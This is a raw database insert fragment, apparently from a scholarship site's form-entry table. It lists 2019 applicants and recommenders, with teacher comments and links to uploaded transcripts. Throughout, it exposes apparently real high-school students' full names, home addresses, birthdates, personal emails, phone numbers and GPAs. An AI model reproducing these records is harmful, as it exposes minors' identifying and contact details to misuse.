months'),(3211,291,8,5,'Advisor/Counselor'),(3212,291,8,7,'Excellent'),(3213,291,8,9,'Excellent'),(3214,291,8,8,'Excellent'),(3215,291,8,14,'MS. Dixon is an excellent student.  She works hard successfully balancing a very demanding academic schedule, work and parenting.  She excels in her academics and is providing an excellent example to her children about hard work and the importance of pursing not only and education but your career goals.  I know she will be an outstanding nurse.'),(3216,291,8,16,'Highly recommended'),(3217,292,8,1.3,'Maria'),(3218,292,8,1.6,'Sweitzer'),(3219,292,8,11,'Wilde Lake High School'),(3220,292,8,12,'Wilde Lake High School'),(3221,292,8,2,'maria_romano-sweitzer@hcpss.org'),(3222,292,8,3,'David Gordon'),(3223,292,8,4,'4 years'),(3224,292,8,5,'Teacher/Professor'),(3225,292,8,7,'Excellent'),(3226,292,8,9,'Excellent'),(3227,292,8,8,'Excellent'),(3228,292,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/David-Gordon.docx'),(3229,292,8,16,'Highly recommended'),(3230,293,6,18.3,'David'),(3231,293,6,18.6,'Gordon'),(3232,293,6,19.1,'4689 Hallowed Stream'),(3233,293,6,19.3,'Ellicott City'),(3234,293,6,19.4,'Maryland'),(3235,293,6,19.5,'21042'),(3236,293,6,19.6,'United States'),(3237,293,6,4,'07-05-01'),(3238,293,6,21,'djgor46@gmail.com'),(3239,293,6,20,'(410) 693-3024'),(3240,293,6,10,'Wilde Lake High School'),(3241,293,6,27,'School Counselor/Advisor'),(3242,293,6,28,'NA'),(3243,293,6,9,'4.0'),(3244,293,6,26,'Computer Engineering'),(3245,293,6,12,'NA'),(3246,293,6,14,'I have been a  member of the National Honor Society for junior and senior year. I  have been a member of the Spanish Honors Society since sophomore year and am president for senior year. I have been a member of Alpha Achievers  since junior year and a member of  the  Wilde Lake Steel Band and Fellowship of Christian Athletes since freshman year.  I was  a member of  Future Business Leaders of America during junior year, Math Team during sophomore year, and Maryland MESA during freshman year.'),(3247,293,6,13,'I received a Letter  of Commendation for the PSAT/NMSQT in 2018. I have been on the Honor Roll every quarter freshman year through senior year. I have  received  outstanding performance awards in Math, Social  Studies, Spanish, and Wind Ensemble. I was  first chair of the trumpet section in the Howard County Honor Band in 2018 and second chair in 2017.'),(3248,293,6,36,'I have volunteered for the First Baptist Church of Guilford Annual Community Health Fair each year from 2016 to 2018.  I am a competitive jump rope athlete and have taught on staff for workshops and camps across the country since 2015,  and I  have been a World Jump Rope Ambassador  since 2018. I volunteered with the BSAP Saturday  Math Academy for  the  fall session in 2018.'),(3249,293,6,37,'Florida A&M University and University of Maryland, College Park.'),(3250,293,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W.-Ruth-Conway-Scholarship-Essay-David-Gordon.docx'),(3251,293,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/David-J-Gordon-Unofficial-Transcript.pdf'),(3252,293,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Zeta-Phi-Beta-Scholarship-Release-David-Gordon.pdf'),(3253,294,6,18.3,'Nia'),(3254,294,6,18.6,'Anderson'),(3255,294,6,19.1,'6736 Quiet Hours'),(3256,294,6,19.3,'Columbia'),(3257,294,6,19.4,'Maryland'),(3258,294,6,19.5,'21045'),(3259,294,6,19.6,'United States'),(3260,294,6,4,'08-14-01'),(3261,294,6,21,'niaanderson6@gmail.com'),(3262,294,6,20,'(240) 454-1895'),(3263,294,6,10,'Hammond High School'),(3264,294,6,27,'Lambda Gamma Zeta (LGZ) Website'),(3265,294,6,28,'N/A'),(3266,294,6,9,'3.26'),(3267,294,6,26,'Legal Communications'),(3268,294,6,12,'NA'),(3269,294,6,14,'1.	National Honor Society, Member\r\n	September 2018-Present\r\n\r\n2.    Hammond HS Student Leadership Cadre                                                        \r\n        September 2017-Present\r\n                                                                                                                                '),(3270,294,6,13,'1.	Hammond High School Scholar Athlete Award\r\n•	Girls Volleyball                  Fall 2015, Fall 2016, Fall 2017\r\n•	Girls Basketball                  Winter 2015\r\n•	Girls Softball                       Spring 2016\r\n\r\n2.	Maryland Athletic Association Scholar Athlete Award\r\n•	Girls Volleyball                  Fall 2015, Fall 2016, Fall 2017\r\n•	Girls Basketball                  Winter 2015\r\n•	Girls Softball                      Spring 2016\r\n\r\n3.	 Hammond High School Honor Roll\r\n•	SY 2015-2016\r\n•	SY 2017-2018\r\n•	SY 2018-2019\r\n\r\n4.	Hammond High School Attendance Award\r\n•	SY 2015-2016\r\n•	SY 2016-2017\r\n•	SY 2017-2018\r\n•	SY 2018-2019\r\n\r\n5.	National Honor Society\r\n•	SY 2018-2019\r\n     \r\n6.	Spelman College Early College Program-Earned 3 College Credits\r\n•	July 2018'),(3271,294,6,36,'1. Howard County Food Bank                                                                      September 2018-Present\r\n                                                                                                                                        (Once a Month /3 Hours)\r\n•	Organize & Sort food pantry donations\r\n•	Pack food items for families \r\n•	Assist families with picking out food items\r\n\r\n2. Reid Temple AME Church, 11/22 Youth Ministry                        September 2015 - Present   \r\n                                                                                                                                          (Twice a Month/ 4 Hours)\r\n•	Provide care and supervision to preschool age children in church nursery \r\n•	Teach bible study lessons to elementary age children \r\n•	Assist with monthly youth church service\r\n\r\n3. 2nd AME District, Young People Division                                     July 2007-Present\r\n                                                                                                                                 (Once a Month/5 hours)\r\n•	Feed the homeless\r\n•	Help with Hurricane Clean Up\r\n•	Participate in Children’s & Youth Choir\r\n\r\n4. HopeWorks of Howard County                                                   	  September 2016 – May 2017\r\n                                                                                                                                        (Once a Month/6 hours)\r\n•	Provide peer counseling \r\n•	Facilitate workshops on healthy relationships\r\n•	Assist with community engagement events'),(3272,294,6,37,'1. Spelman College-Atlanta, GA\r\n2. Howard University-Washington, DC'),(3273,294,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Zeta-Essay-W.-Ruth-Conway.docx'),(3274,294,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Unofficial-Transcript-Nia-Anderson.pdf'),(3275,294,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Zeta-Release-Form.pdf'),(3276,295,8,1.3,'Jillian'),(3277,295,8,1.6,'Hoffman'),(3278,295,8,11,'Howard High School/HCPSS'),(3279,295,8,12,'School Counselor'),(3280,295,8,2,'jillian_hoffman@hcpss.org'),(3281,295,8,3,'Naomi Smith'),(3282,295,8,4,'Three Years'),(3283,295,8,5,'Advisor/Counselor'),(3284,295,8,7,'Excellent'),(3285,295,8,9,'Excellent'),(3286,295,8,8,'Excellent'),(3287,295,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Letter-of-Recommendation.Smith-Naomi.2018.10.15.pdf'),(3288,295,8,16,'Highly recommended'),(3289,296,8,1.3,'Meg'),(3290,296,8,1.6,'Ignacio'),(3291,296,8,11,'Leadership Howard County'),(3292,296,8,12,'Director, Youth Programs-Leadership U'),(3293,296,8,2,'mignacio@leadershiphc.org'),(3294,296,8,3,'Julian Basena'),(3295,296,8,4,'2 years'),(3296,296,8,5,'Other'),(3297,296,8,7,'N/A'),(3298,296,8,9,'Excellent'),(3299,296,8,8,'Excellent'),(3300,296,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Julian-Basena-W-Ruth-Conway-Scholarship-Recommendation.pdf'),(3301,296,8,16,'Highly recommended'),(3302,297,8,1.3,'William'),(3303,297,8,1.6,'Reinhart'),(3304,297,8,11,'Atholton High School'),(3305,297,8,12,'JROTC Senior Army Instructor'),(3306,297,8,2,'william_reinhart@hcpss.org'),(3307,297,8,3,'Morgan Young'),(3308,297,8,4,'4-years'),(3309,297,8,5,'Teacher/Professor'),(3310,297,8,7,'Excellent'),(3311,297,8,9,'Excellent'),(3312,297,8,8,'Excellent'),(3313,297,8,14,'Please see my attached letter.  I can honestly not over state how much I think of Morgan.  She is truly a good person, a positive role model, and a future leader within our nation.  She is certainly deserving of this scholarship.'),(3314,297,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Young-W.-Ruth-Conway-Scholarship.pdf'),(3315,297,8,16,'Highly recommended'),(3316,298,8,1.3,'Tina'),(3317,298,8,1.6,'LeBaron'),(3318,298,8,11,'ARL'),(3319,298,8,12,'Animation & Interactive Media Instructor'),(3320,298,8,2,'tina_lebaron@hcpss.org'),(3321,298,8,3,'Gabrielle'),(3322,298,8,4,'Aidam'),(3323,298,8,5,'Teacher/Professor'),(3324,298,8,7,'Excellent'),(3325,298,8,9,'Excellent'),(3326,298,8,8,'Excellent'),(3327,298,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/GabrielleAidamArtRecommendation.pdf'),(3328,298,8,16,'Highly recommended'),(3329,299,8,1.3,'Kathleen'),(3330,299,8,1.6,'Scott'),(3331,299,8,11,'Hammond High School'),(3332,299,8,12,'Social Studies Teacher'),(3333,299,8,2,'Kathleen_Scott@hcpss.org'),(3334,299,8,3,'Amanda Russell'),(3335,299,8,4,'2 years'),(3336,299,8,5,'Teacher/Professor'),(3337,299,8,7,'Excellent'),(3338,299,8,9,'Excellent'),(3339,299,8,8,'Excellent'),(3340,299,8,14,'To Whom It May Concern:\r\n\r\n	My name is Kathleen Scott. I am a Social Studies teacher at Hammond High School in Howard County, Maryland. I would like to recommend Amanda Russell, my former student, for the W. Ruth Conway Scholarship. I was Amanda’s AP Psychology teacher. She was one of my brightest students with a positive attitude and great character.\r\n	Amanda is the ideal academic student. She comes into class focused each and everyday. It was such a pleasure to teach her in AP Psychology because she was interested in the subject matter, committed to learn, and always had a smile on. Her willingness to be present and motivated in class truly made her stand out. I could always count on her work to be detailed and accurate. I really appreciated her willingness to share in class, and be part of the class discussion. I have seen her brain project from that class and it blew me away! She really enhances every classroom she works in\r\n	Not only is Amanda a great academic, but she is also a friend to many students in the classroom and a leader in the school. She was always willing to help students around her that may have struggled with the content more than she did, even if they weren’t close friends. I was always impressed with her kindness, and I think other students were too. She was elected to be the Student Government Association President her senior year because so many students respect her and trust in her leadership skills. As the SGA President she gives the announcements everyday, plans our school’s spirit week, and organizes fundraisers for the entire school. She is in the highest leadership position in the entire school, and she practices this role exceedingly well. Her leadership skills, kindness, and work ethic exemplify the characteristics of the W. Ruth Conway Scholarship.\r\n	Amanda is truly a wonderful student, for her love of learning and for her care for others. For these reasons I would like to recommend Amanda Russell for the W. Ruth Conway Scholarship. If you have any questions please feel free to contact me at Kathleen_Scott@hcpss.org. \r\n\r\nThank You,\r\nKathleen Scott\r\nSocial Studies Teacher\r\nHammond High School\r\nHoward County Public School'),(3341,299,8,16,'Highly recommended'),(3342,300,8,1.3,'Alexander'),(3343,300,8,1.6,'Livieratos'),(3344,300,8,11,'Hammond High School'),(3345,300,8,12,'Social Studies Instructional Team Leader'),(3346,300,8,2,'alexander_livieratos@hcpss.org'),(3347,300,8,3,'Amanda Russell'),(3348,300,8,4,'4 years'),(3349,300,8,5,'Teacher/Professor'),(3350,300,8,7,'Excellent'),(3351,300,8,9,'Excellent'),(3352,300,8,8,'Excellent'),(3353,300,8,14,'Amanda is amazing student, who is kind, caring, and leads by example in everything she does. I have attached a letter of recommendation, but please let me know if you have any questions or would like to talk more.'),(3354,300,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Recommendation-Letter-for-Amanda-Russell-Scholarship.docx'),(3355,300,8,16,'Highly recommended'),(3356,301,6,18.3,'Layla'),(3357,301,6,18.6,'Foster'),(3358,301,6,19.1,'5033 Round Tower Place'),(3359,301,6,19.3,'Columbia'),(3360,301,6,19.4,'MD'),(3361,301,6,19.5,'21044'),(3362,301,6,19.6,'United States'),(3363,301,6,4,'08/07/01'),(3364,301,6,21,'lmfoster2001@gmail.com'),(3365,301,6,20,'(410) 964-0929'),(3366,301,6,10,'Wilde Lake High School'),(3367,301,6,27,'Other'),(3368,301,6,28,'Posted on Naviance, a software provider used by my school'),(3369,301,6,9,'3.40'),(3370,301,6,26,'Marketing'),(3371,301,6,12,'NA'),(3372,301,6,14,'Member of National Honor Society (2018-2019)\r\nMember of Delta Scholars Program (2018-2019)\r\nMember of Rho Kappa- Social Studies Honor Society (2018-2019)\r\nMember of Delta Epsilon Phi- National German Honor Society (2017-2019)\r\nTeam player for Volleyball Team at Wilde Lake (2015)'),(3373,301,6,13,'22nd Annual Celebration of Excellence Award from the Council of Elders (2019)\r\n28th Annual Portfolio Development and Senior Show (2018 & 2019)\r\nYouth Art Month Certificate of Recognition (2017)\r\nHonor Roll Athlete (2016)\r\nAcademic Honor Roll (multiple years)'),(3374,301,6,36,'(November 10, 2018) Long & Foster Co. 9th Annual Holiday Market\r\n(November 19-20, 2018) Book sales during parent/teacher conferences for speech & debate team\r\n(November 21, 2018) 4th Annual Free Community Thanksgiving Day Dinner food donation at Melville United Methodist Church\r\n(December 22, 2018) Happy Helpers for the Homeless sandwich prep\r\n(January 21, 2019) Glen Mar Church 2019 Day of Service\r\n(March 17, 2019) Grassroots Soup\'r Sundae 2019 at Wilde Lake High School'),(3375,301,6,37,'Drexel University\r\nUniversity of Maryland- College Park'),(3376,301,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W.-Ruth-Conway-Scholarship-Essay-Mar-29.docx'),(3377,301,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Layla-Foster-Transcript-2019.pdf'),(3378,301,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Lambda-Gamma-Zeta-Photo-Release-Form.pdf'),(3379,302,8,1.3,'Adrienne'),(3380,302,8,1.6,'Nasir'),(3381,302,8,11,'Atholton High School'),(3382,302,8,12,'Assistant Principal'),(3383,302,8,2,'Adrienne_Nasir@Hcpss.org'),(3384,302,8,3,'Gloria Ogordi'),(3385,302,8,4,'4 years'),(3386,302,8,5,'Administrator'),(3387,302,8,7,'Excellent'),(3388,302,8,9,'Excellent'),(3389,302,8,8,'Excellent'),(3390,302,8,14,'Please see attachment'),(3391,302,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Gloria-Ogordi-2019.pdf'),(3392,302,8,16,'Highly recommended'),(3393,303,6,18.3,'Amanda'),(3394,303,6,18.6,'Russell'),(3395,303,6,19.1,'7368 Eden Brook Drive'),(3396,303,6,19.2,'618'),(3397,303,6,19.3,'Columbia'),(3398,303,6,19.4,'Maryland'),(3399,303,6,19.5,'21046'),(3400,303,6,19.6,'United States'),(3401,303,6,4,'06-09-01'),(3402,303,6,21,'amandatrussell9@gmail.com'),(3403,303,6,20,'(443) 812-2825'),(3404,303,6,10,'Hammond High School'),(3405,303,6,27,'Friend/Family Member'),(3406,303,6,28,'N/A'),(3407,303,6,9,'3.81'),(3408,303,6,26,'Psychology for sure, possibly a double major in Criminal Law'),(3409,303,6,12,'N/A'),(3410,303,6,14,'Student Government Association- Co-President: 2018-2019;  Student Representative: 2017-2018\r\nNational Honors Society- Member: 2017-2019'),(3411,303,6,13,'Principal\'s Honor Roll: 2015, 2016, 2019\r\nGold Honor Roll: 2015, 2016, 2017, 2018, 2019\r\nAdvanced Placement Scholar (3 or higher on 3 or more AP Tests): 2018'),(3412,303,6,36,'Jingle Bell Run: Worked a stand for the 5k activities- December 8, 2018\r\nNational Honor Society Induction: Worked as an escort for the students, and helped serve refreshments- December 14, 2018\r\nSoup\'r Sundae: Served soup to the community- March 24, 2018\r\nBreakfast with Santa: worked as a waitress to serve food to families- December 9, 2017\r\nMontgomery County Public Schools: Worked at Col E. Brook Lee Middle School by organizing classrooms, setting up boards and classrooms, and taking inventory- August 17-21, 2016; August 21-25, 2017; August 17-21, 2018'),(3413,303,6,37,'I have just recently committed to the University of Maryland: College Park.'),(3414,303,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W.-Ruth-Conway-Essay.pdf'),(3415,303,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Unofficial-Transcript.pdf'),(3416,303,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Release-Form.pdf'),(3417,304,6,18.3,'Naomi'),(3418,304,6,18.6,'Smith'),(3419,304,6,19.1,'7430 Jeans Way'),(3420,304,6,19.3,'Ellicott City'),(3421,304,6,19.4,'MD'),(3422,304,6,19.5,'21043'),(3423,304,6,19.6,'United States'),(3424,304,6,4,'04/23/01'),(3425,304,6,21,'naomi.smith042@gmail.com'),(3426,304,6,20,'(443) 820-5583'),(3427,304,6,10,'Howard High School'),(3428,304,6,27,'Friend/Family Member'),(3429,304,6,28,'N/A'),(3430,304,6,9,'4.0'),(3431,304,6,26,'Computer Science'),(3432,304,6,12,'NA'),(3433,304,6,14,'Habitat for Humanity - Secretary (2 years)\r\nTrack & Field- JV (1 year), Varsity (3 years), Varsity Captain ( 1 year)\r\nGirl\'s Lacrosse: JV (1 year), Varsity (3 years)\r\nNational Honor Society : Member (2 years)\r\nNational Technical Honor Society:  Member (1 year)\r\nSpanish Honor Society:  Member (2 years)\r\nBlack Student Union:  Member (3 years)\r\nAfrican Student Association:  Member (1 year)\r\nDelta Scholars: Member (2 years)'),(3434,304,6,13,'President\'s Education Award:  2015\r\nAcademic Honor Roll:  2015-2019\r\nPrincipal\'s Honor Roll: 2019'),(3435,304,6,36,'Habitats for Humanity (ReStore Volunteer):  September, 2017 - current\r\nCity Beat Baltimore (Volunteer): April 2018 - current'),(3436,304,6,37,'University of North Carolina Chapel Hill\r\nUniversity of Maryland College Park\r\nDrexel University\r\nUniversity of Miami'),(3437,304,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W-Ruth-Conway-Essay.pdf'),(3438,304,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Unoffiicial-Transcript.pdf'),(3439,304,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Conway-Photo-Release-Form.pdf'),(3440,305,8,1.3,'Amber'),(3441,305,8,1.6,'Spencer'),(3442,305,8,11,'Hammond High School'),(3443,305,8,12,'English Teacher'),(3444,305,8,2,'amber_spencer@hcpss.org'),(3445,305,8,3,'Nia Anderson'),(3446,305,8,4,'I have known Nia Anderson for two years.'),(3447,305,8,5,'Teacher/Professor'),(3448,305,8,7,'Excellent'),(3449,305,8,9,'Excellent'),(3450,305,8,8,'Excellent'),(3451,305,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/N.-Anderson-Spring-2019.docx'),(3452,305,8,16,'Highly recommended'),(3453,306,8,1.3,'Dhdjd'),(3454,306,8,1.6,'Dndjdjjd'),(3455,306,8,11,'Dhdjdjj'),(3456,306,8,12,'Shdjdj'),(3457,306,8,2,'naerri3@yahoo.com'),(3458,306,8,3,'JDJDjdjdjd'),(3459,306,8,4,'Dmdjdjdjhddhjd'),(3460,306,8,5,'Teacher/Professor'),(3461,306,8,7,'Excellent'),(3462,306,8,9,'Excellent'),(3463,306,8,8,'Excellent'),(3464,306,8,14,'Dndjdjjd'),(3465,306,8,16,'Highly recommended'),(3466,307,8,1.3,'Sheila'),(3467,307,8,1.6,'Carr-Spence'),(3468,307,8,11,'Atholton High School'),(3469,307,8,12,'Mathematics Teacher'),(3470,307,8,2,'sheila_carr-spence@hcpss.org'),(3471,307,8,3,'Morgan Young'),(3472,307,8,4,'three years'),(3473,307,8,5,'Teacher/Professor'),(3474,307,8,7,'Excellent'),(3475,307,8,9,'Excellent'),(3476,307,8,8,'Excellent'),(3477,307,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/recommendation-for-Morgan-Young.docx'),(3478,307,8,16,'Highly recommended'),(3479,308,8,1.3,'Lisa'),(3480,308,8,1.6,'Clearfield'),(3481,308,8,11,'Atholton High School'),(3482,308,8,12,'School Counselor'),(3483,308,8,2,'Lisa_Clearfield@hcpss.org'),(3484,308,8,3,'Ergine Remy'),(3485,308,8,4,'I have known Ergine for the past 4 years as her school counselor.'),(3486,308,8,5,'Advisor/Counselor'),(3487,308,8,7,'Excellent'),(3488,308,8,9,'Average'),(3489,308,8,8,'Excellent'),(3490,308,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Remy-Ergine.docx'),(3491,308,8,16,'Highly recommended'),(3492,309,8,1.3,'Diana'),(3493,309,8,1.6,'Thesing'),(3494,309,8,11,'Oakland Mills High School (OMHS)'),(3495,309,8,12,'ESOL Teacher'),(3496,309,8,2,'diana_thesing@hcpss.org'),(3497,309,8,3,'Justine Andrea Wabo'),(3498,309,8,4,'September 2017'),(3499,309,8,5,'Teacher/Professor'),(3500,309,8,7,'Excellent'),(3501,309,8,9,'Excellent'),(3502,309,8,8,'Excellent'),(3503,309,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Recommendaiton-letter-Justine-Wabo.docx'),(3504,309,8,16,'Highly recommended'),(3505,310,8,1.3,'Jennifer'),(3506,310,8,1.6,'Day'),(3507,310,8,11,'Mount Saint Joseph High School'),(3508,310,8,12,'Counselor'),(3509,310,8,2,'drrringgold@gmail.com'),(3510,310,8,3,'Albert Jackson'),(3511,310,8,4,'3'),(3512,310,8,5,'Advisor/Counselor'),(3513,310,8,7,'Excellent'),(3514,310,8,9,'Excellent'),(3515,310,8,8,'Excellent'),(3516,310,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Jennifer-Day-Recommendation-Letter.docx'),(3517,310,8,16,'Highly recommended'),(3518,311,8,1.3,'Tyler'),(3519,311,8,1.6,'Petrini'),(3520,311,8,11,'Howard High School'),(3521,311,8,12,'Spanish Educator'),(3522,311,8,2,'tyler_petrini@hcpss.org'),(3523,311,8,3,'Naomi Smith'),(3524,311,8,4,'6 months'),(3525,311,8,5,'Teacher/Professor'),(3526,311,8,7,'Excellent'),(3527,311,8,9,'Excellent'),(3528,311,8,8,'Excellent'),(3529,311,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Rec-Letter-for-Naomi-Smith.docx'),(3530,311,8,16,'Highly recommended'),(3531,312,6,18.3,'Nailah'),(3532,312,6,18.6,'Downing'),(3533,312,6,19.1,'9901 flora court'),(3534,312,6,19.3,'Laurel'),(3535,312,6,19.4,'Maryland'),(3536,312,6,19.5,'20723'),(3537,312,6,19.6,'United States'),(3538,312,6,4,'04-13-01'),(3539,312,6,21,'nailahsdowning@gmail.com'),(3540,312,6,20,'(240) 346-7911'),(3541,312,6,10,'Atholton High School'),(3542,312,6,27,'Friend/Family Member'),(3543,312,6,28,'N/A'),(3544,312,6,9,'3.49'),(3545,312,6,26,'Psychology or Music'),(3546,312,6,12,'NA'),(3547,312,6,14,'Black student union - 3 years\r\nDelta Scholars - 3 years\r\nPre-med club - 2 years\r\nNational Spanish Honors Society - 2 years\r\nAtholton\'s Mobilizing Women\'s Club - 2 years\r\nNational Honor Society - 1 year\r\nFor the Community Club - 1 year - Co-founder'),(3548,312,6,13,'Inducted into Delta Scholars - 2016\r\nInducted in National Spanish Honors Society - 2017\r\nInducted in National Honor Society - 2018'),(3549,312,6,36,'Capital Area Food Bank - sorting food to be donate to homeless shelters - November 2017-present\r\nFood and Friends - providing food for disadvantaged people living in Washington, D.C. - November 10, 2018-present\r\nForesters Financial - homeless shelter volunteer - January 12, 2018\r\nForesters Financial - Diaper drive - February 2018\r\nForesters Financial - making Christmas packages for mothers with disabled children - November 13, 2018\r\nAtholton For the Community - community clean up January 16, 2019\r\nAtholton For the Community - community clean up February 15, 2019\r\nAtholton For the Community - canned food drive organization March 31, 2019'),(3550,312,6,37,'Spelman College\r\nHoward University\r\nFlorida A&M University'),(3551,312,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/zetascholarshipmarch27.pdf'),(3552,312,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Nailahs-Transcript.pdf'),(3553,312,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/releaseformscholarshipzeta.pdf'),(3554,313,8,1.3,'Ryan'),(3555,313,8,1.6,'Fuentes'),(3556,313,8,11,'Hammond High School'),(3557,313,8,12,'School Counselor'),(3558,313,8,2,'ryan_fuentes@hcpss.org'),(3559,313,8,3,'Chelsea Amihere'),(3560,313,8,4,'3 years'),(3561,313,8,5,'Advisor/Counselor'),(3562,313,8,7,'Excellent'),(3563,313,8,9,'Excellent'),(3564,313,8,8,'Excellent'),(3565,313,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/C-Amihere-LOR-Scholarship.docx'),(3566,313,8,16,'Highly recommended'),(3567,314,8,1.3,'Deirdre'),(3568,314,8,1.6,'Lindsey'),(3569,314,8,11,'Atholton HS'),(3570,314,8,12,'Chemistry Teacher'),(3571,314,8,2,'deirdre_lindsey@gmail.com'),(3572,314,8,3,'Nailah Downing'),(3573,314,8,4,'two years'),(3574,314,8,5,'Teacher/Professor'),(3575,314,8,6,'In addition to teacher:  Mentor, Coach, and DS Honor Society Advisor'),(3576,314,8,7,'Average'),(3577,314,8,9,'Excellent'),(3578,314,8,8,'Excellent'),(3579,314,8,14,'I am writing this letter in support of Nailah Downing’s application.  I have had the pleasure of getting to know Nailah Downing over the course of the past two years first as her chemistry teacher and subsequently as faculty advisor for the Delta Scholars honor society. During this time, Nailah has demonstrated growth in leadership skills, academics, and service, both inside and out of the classroom.\r\n\r\nNailah is strongly motivated and determined to go the extra mile to achieve any goal she sets for herself. Her dedication to the Delta Scholars organization is evident in her commitment of time and talent. She also contributes to our regular scheduled meetings, where she exhibits poise and serves as leader and role model to the general membership.\r\n\r\nIn addition to her academic and service excellence, Nailah’s personality truly makes her stand out. She can light up a room with her sense of humor, but she is also very practical, level-headed, and businesslike when necessary. She has a real talent for bringing people with different personalities together, and drawing out everyone’s best qualities. As an astute leader, she has a special ability to inspire any group to work as a cohesive team in order to get things done for the greater good. It is an honor to recommend Nailah, and I believe she has shown the resilience and skills to make a solid contribution to your entering class. \r\n\r\nFeel free to contact me at Deirdre_lindsey@hcpss.org'),(3580,314,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Nailah-Downing.docx'),(3581,314,8,16,'Highly recommended'),(3582,315,8,1.3,'Nicole'),(3583,315,8,1.6,'Coke'),(3584,315,8,11,'Atholton High School'),(3585,315,8,12,'English Teacher'),(3586,315,8,2,'nicole_coke@hcpss.org'),(3587,315,8,3,'Nailah Downing'),(3588,315,8,4,'1 year and 1 month'),(3589,315,8,5,'Teacher/Professor'),(3590,315,8,7,'Average'),(3591,315,8,9,'Average'),(3592,315,8,8,'Excellent'),(3593,315,8,14,'In regard to Nailah\'s demonstrated leadership, she has not been in Howard County for her entire HS period, thus, compared to other students who have had the time to build and augment their leadership skills, and outlets, she is average to above average. She did, in her defense, decide last year to organize a club that is community minded; to recruit members who have a heart for serving; and to hold club meetings and plan outings that benefit her community. This demonstrates an ability and a desire to lead in an area for which she has a passion, rather than to lead anything or everything for the sake of plumping her resume.'),(3594,315,8,16,'Highly recommended'),(3595,316,6,18.3,'Julian'),(3596,316,6,18.6,'Basena'),(3597,316,6,19.1,'6327 Roan Stallion Lane'),(3598,316,6,19.3,'Columbia'),(3599,316,6,19.4,'Maryland'),(3600,316,6,19.5,'21045'),(3601,316,6,19.6,'United States'),(3602,316,6,4,'08-14-01'),(3603,316,6,21,'jbasen93@gmail.com'),(3604,316,6,20,'(443) 935-9232'),(3605,316,6,10,'Long Reach High School'),(3606,316,6,27,'BSAP Advisor'),(3607,316,6,28,'N/A'),(3608,316,6,9,'4.14'),(3609,316,6,26,'Journalism -Sports Media'),(3610,316,6,12,'N/A'),(3611,316,6,14,'2017-Present:  Lightning Leader, Member\r\n·         Escort new students around the school\r\n·         Organize events and assist new students\r\n2015-Present:  Alpha Achievers,  Executive Board Member\r\n·         Organize and volunteer for events\r\n·         Mentor elementary school kids      \r\n2017-Present: National Honors Society, Member/ Tutor \r\n·           Act as a role model for other students within school             \r\n·           Volunteer in community or school events'),(3612,316,6,13,'Gold Honor Roll, 9th Grade (3.4 GPA or higher)\r\nSilver Honor Roll, 10th Grade (3..0-3.39)\r\nGold Honor Roll, 11th Grade (3.4 GPA or higher)\r\nPrincipal’s Honor Roll, 11th Grade (4.0 GPA)\r\nNational Honor Society\r\nFrench Honor Society'),(3613,316,6,36,'2017, Summer- December 2: Leadership U, 